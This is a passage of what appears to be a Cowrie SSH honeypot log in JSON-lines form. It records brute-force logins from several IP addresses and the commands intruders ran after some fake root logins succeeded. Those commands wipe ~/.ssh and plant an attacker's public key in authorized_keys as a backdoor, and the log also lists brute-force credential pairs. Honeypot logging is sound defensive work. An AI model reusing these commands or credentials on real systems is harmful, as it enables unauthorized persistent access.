AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:53:14.029016Z","src_ip":"212.227.235.229","session":"44c15f4cffb1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:53:14.363533Z","src_ip":"212.227.235.229","session":"44c15f4cffb1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:53:14.364431Z","src_ip":"212.227.235.229","session":"44c15f4cffb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56348,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2df77dd32de","protocol":"ssh","message":"New connection: 212.227.235.229:56348 (1.2.3.4:22) [session: d2df77dd32de]","sensor":"my-vps","timestamp":"2025-09-09T03:53:14.648271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:53:14.649405Z","src_ip":"212.227.235.229","session":"d2df77dd32de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:53:14.895150Z","src_ip":"212.227.235.229","session":"d2df77dd32de"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:53:15.644781Z","src_ip":"212.227.235.229","session":"d2df77dd32de"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:53:16.928383Z","src_ip":"212.227.235.229","session":"d2df77dd32de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50488,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9cbfee4c7ef","protocol":"ssh","message":"New connection: 212.227.235.229:50488 (1.2.3.4:22) [session: c9cbfee4c7ef]","sensor":"my-vps","timestamp":"2025-09-09T03:53:17.260257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:53:17.261365Z","src_ip":"212.227.235.229","session":"c9cbfee4c7ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:53:17.577872Z","src_ip":"212.227.235.229","session":"c9cbfee4c7ef"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:53:18.389122Z","src_ip":"212.227.235.229","session":"c9cbfee4c7ef"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":41078,"dst_ip":"1.2.3.4","dst_port":22,"session":"8beecfdb029c","protocol":"ssh","message":"New connection: 152.32.190.168:41078 (1.2.3.4:22) [session: 8beecfdb029c]","sensor":"my-vps","timestamp":"2025-09-09T03:53:18.560420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:53:18.561269Z","src_ip":"152.32.190.168","session":"8beecfdb029c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:53:18.766213Z","src_ip":"152.32.190.168","session":"8beecfdb029c"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:53:18.914306Z","src_ip":"212.227.235.229","session":"44c15f4cffb1"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:53:18.915219Z","src_ip":"212.227.235.229","session":"c9cbfee4c7ef"}
{"eventid":"cowrie.login.failed","username":"super","password":"password123","message":"login attempt [super/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T03:53:19.626355Z","src_ip":"152.32.190.168","session":"8beecfdb029c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:53:20.834558Z","src_ip":"152.32.190.168","session":"8beecfdb029c"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":55956,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9f3957fdbfa","protocol":"ssh","message":"New connection: 211.22.25.164:55956 (1.2.3.4:22) [session: f9f3957fdbfa]","sensor":"my-vps","timestamp":"2025-09-09T03:53:39.289252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:53:39.290099Z","src_ip":"211.22.25.164","session":"f9f3957fdbfa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:53:39.529776Z","src_ip":"211.22.25.164","session":"f9f3957fdbfa"}
{"eventid":"cowrie.login.failed","username":"dev","password":"2025","message":"login attempt [dev/2025] failed","sensor":"my-vps","timestamp":"2025-09-09T03:53:40.528762Z","src_ip":"211.22.25.164","session":"f9f3957fdbfa"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62800,"dst_ip":"1.2.3.4","dst_port":22,"session":"c892a7f639eb","protocol":"ssh","message":"New connection: 217.72.205.35:62800 (1.2.3.4:22) [session: c892a7f639eb]","sensor":"my-vps","timestamp":"2025-09-09T03:53:41.166979Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:53:41.168025Z","src_ip":"217.72.205.35","session":"c892a7f639eb"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:53:41.771372Z","src_ip":"211.22.25.164","session":"f9f3957fdbfa"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":52300,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa9ec4e643cb","protocol":"ssh","message":"New connection: 51.81.118.153:52300 (1.2.3.4:22) [session: fa9ec4e643cb]","sensor":"my-vps","timestamp":"2025-09-09T03:54:06.693516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:54:06.694447Z","src_ip":"51.81.118.153","session":"fa9ec4e643cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:54:06.790020Z","src_ip":"51.81.118.153","session":"fa9ec4e643cb"}
{"eventid":"cowrie.login.success","username":"root","password":"asdasxcq23e@#5C27893e","message":"login attempt [root/asdasxcq23e@#5C27893e] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:54:07.215636Z","src_ip":"51.81.118.153","session":"fa9ec4e643cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:54:07.428111Z","src_ip":"51.81.118.153","session":"fa9ec4e643cb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:54:07.428920Z","src_ip":"51.81.118.153","session":"fa9ec4e643cb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:54:07.430415Z","src_ip":"51.81.118.153","session":"fa9ec4e643cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:54:07.528729Z","src_ip":"51.81.118.153","session":"fa9ec4e643cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:54:07.826086Z","src_ip":"51.81.118.153","session":"fa9ec4e643cb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:54:07.826828Z","src_ip":"51.81.118.153","session":"fa9ec4e643cb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:54:07.924587Z","src_ip":"51.81.118.153","session":"fa9ec4e643cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:54:07.925472Z","src_ip":"51.81.118.153","session":"fa9ec4e643cb"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":52304,"dst_ip":"1.2.3.4","dst_port":22,"session":"813506bcc4f4","protocol":"ssh","message":"New connection: 51.81.118.153:52304 (1.2.3.4:22) [session: 813506bcc4f4]","sensor":"my-vps","timestamp":"2025-09-09T03:54:08.017261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:54:08.017938Z","src_ip":"51.81.118.153","session":"813506bcc4f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:54:08.112018Z","src_ip":"51.81.118.153","session":"813506bcc4f4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:54:08.534074Z","src_ip":"51.81.118.153","session":"813506bcc4f4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:54:09.631848Z","src_ip":"51.81.118.153","session":"813506bcc4f4"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":52320,"dst_ip":"1.2.3.4","dst_port":22,"session":"315019a7af28","protocol":"ssh","message":"New connection: 51.81.118.153:52320 (1.2.3.4:22) [session: 315019a7af28]","sensor":"my-vps","timestamp":"2025-09-09T03:54:09.726990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:54:09.728117Z","src_ip":"51.81.118.153","session":"315019a7af28"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:54:09.824019Z","src_ip":"51.81.118.153","session":"315019a7af28"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:54:10.255514Z","src_ip":"51.81.118.153","session":"315019a7af28"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:54:10.352944Z","src_ip":"51.81.118.153","session":"fa9ec4e643cb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:54:10.353822Z","src_ip":"51.81.118.153","session":"315019a7af28"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":42540,"dst_ip":"1.2.3.4","dst_port":22,"session":"72aaa1c7cf05","protocol":"ssh","message":"New connection: 152.32.190.168:42540 (1.2.3.4:22) [session: 72aaa1c7cf05]","sensor":"my-vps","timestamp":"2025-09-09T03:54:23.868848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:54:23.869536Z","src_ip":"152.32.190.168","session":"72aaa1c7cf05"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:54:24.124778Z","src_ip":"152.32.190.168","session":"72aaa1c7cf05"}
